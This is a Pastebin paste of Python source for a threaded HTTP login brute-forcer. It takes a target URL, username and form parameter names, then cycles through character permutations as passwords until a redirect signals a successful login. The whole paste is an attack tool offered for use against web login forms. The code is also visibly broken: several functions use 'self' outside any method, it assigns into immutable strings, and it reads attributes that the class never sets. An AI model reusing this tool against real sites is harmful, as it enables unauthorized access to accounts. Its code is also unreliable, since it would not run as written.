Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import argparse
- import sys
- import os
- import threading
- from HttpLogin import HttpLogin
- def main(thread_pool, event):
- for i in range(len(thread_pool)):
- try:
- thread_pool[i].join()
- except:
- event.set()
- parser = argparse.ArgumentParser(description="A complete Http Bruteforcer by St3veR0nix", )
- Required = parser.add_argument_group("required arguments")
- Required.add_argument("-u", "--url", type=str, required=True, help="Set the target url")
- Required.add_argument("-p", "--port", type=int, required=True, help="Port number")
- Required.add_argument("-U", "--username", type=str, required=True, help="The Username to use for login")
- Required.add_argument("-a", "--uri", type=str, required=True, help="A reference URI for knowing if the login was succesfull, like /example.php")
- Required.add_argument("-up", "--user-parameter", required=True, help="The parameter for the user in http body request")
- Required.add_argument("-pp", "--pass-parameter", required=True, help="The parameter for the password in http body request")
- parser.add_argument("-c", "--char", type=int, required=False, default=1, help="Character set: < 1 = a-z, 2 = 0-9, 3 = A-Z, 4 = a-z0-9, 5 = A-Z0-9, 6 = a-zA-Z0-9 >")
- parser.add_argument("-m", "--min", type=int, required=False, default=1, help="Minimum length of permutations, default=1")
- parser.add_argument("-M", "--max", type=int, required=False, default=1, help="Maximum length of permutations, default=1")
- parser.add_argument("-r", "--request-method", type=str, required=False, default="GET", help="The request method, GET or POST, default=GET" )
- parser.add_argument("-b", "--body", type=str, required=False, default="", help="Additional http body parameters, must be like example=test or example=test&example2=test2 and so on")
- args = parser.parse_args()
- print("Setting target URL to " + args.url + " on port " + str(args.port) + "...")
- print("Setting method of the request to " + args.request_method + "...")
- print("Setting " + str(args.max) + " threads for permutations...")
- print("nStarting Bruteforce with username " + args.username)
- character_dictionary = {
- 1 : ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm','n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'],
- 2 : ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9'],
- 3 : ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M',
- 'N','O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y','Z'],
- 4 : ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',
- 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',
- '0', '1', '2', '3', '4', '5', '6', '7', '8', '9'],
- 5 : ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M',
- 'N','O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y','Z',
- '0', '1', '2', '3', '4', '5', '6', '7', '8', '9'],
- 6 : ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',
- 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',
- 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M',
- 'N','O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y','Z',
- '0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
- }
- characters = character_dictionary[args.char]
- perm = args.min
- thread_pool = []
- event = threading.Event()
- for i in range(args.max):
- if perm > args.max:
- break
- bf = HttpLogin(args.url, args.port, perm, characters, args.uri, args.user_parameter, args.pass_parameter, args.username, args.body, args.request_method, event)
- if perm <= args.max:
- thread_pool.append(bf)
- thread_pool[i].start()
- perm += 1
- main(thread_pool, event)
- import threading
- import requests
- class HttpLogin(threading.Thread):
- host = ""
- port = 0
- perm = 0
- char_set= []
- URI = "/"
- user_p = ""
- passwd_p = ""
- username = ""
- http_method = "GET"
- event = threading.Event()
- body = ""
- data = {}
- def __init__(self, host, port, perm, char_set, URI, user_p, passwd_p, username, body, http_method, event):
- threading.Thread.__init__(self)
- self.host = host
- self.port = port
- self.perm = perm
- self.char_set = char_set
- self.URI = URI
- self.user_p = user_p
- self.passwd_p = passwd_p
- self.username = username
- self.http_method = http_method
- self.event = event
- self.body = body
- self.data[self.user_p] = self.username
- try:
- splitted_body = self.body.split("&")
- for s in splitted_body:
- try:
- parameter = s.split("=")[0]
- value = s.split("=")[1]
- self.data[parameter] = value
- except:
- pass
- except:
- splitted_body = self.body.split("=")
- self.data[splitted_body[0]] = splitted_body[1]
- def run(self):
- while not self.event.is_set():
- buf = self.char_set[0] * self.perm
- try:
- send_permutations(buf, len(buf), self.char_set)
- except:
- pass
- def send_permutations(buf, buf_l, char_set):
- i = buf_l - 1
- if i < 0:
- return
- for c in char_set:
- buf[i] = c
- print(buf)#, end="r")
- try:
- res = sendlogin(buf)
- if isLogin(res) == True:
- print("nnPassword Found! --> " + buf)
- self.event.set()
- except:
- pass
- send_permutations(buf, buf_l -1, char_set)
- def sendlogin(password):
- self.data[self.passwd_p] = password
- res = None
- if self.http_method == "GET":
- res = requests.get(self.url, data=self.data)
- elif self.http_method == "POST":
- res = requests.post(self.url, data=self.data)
- return res
- def isLogin(res):
- for i in res.history:
- if i.headers['location'] == self.uri:
- return True
- return False
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
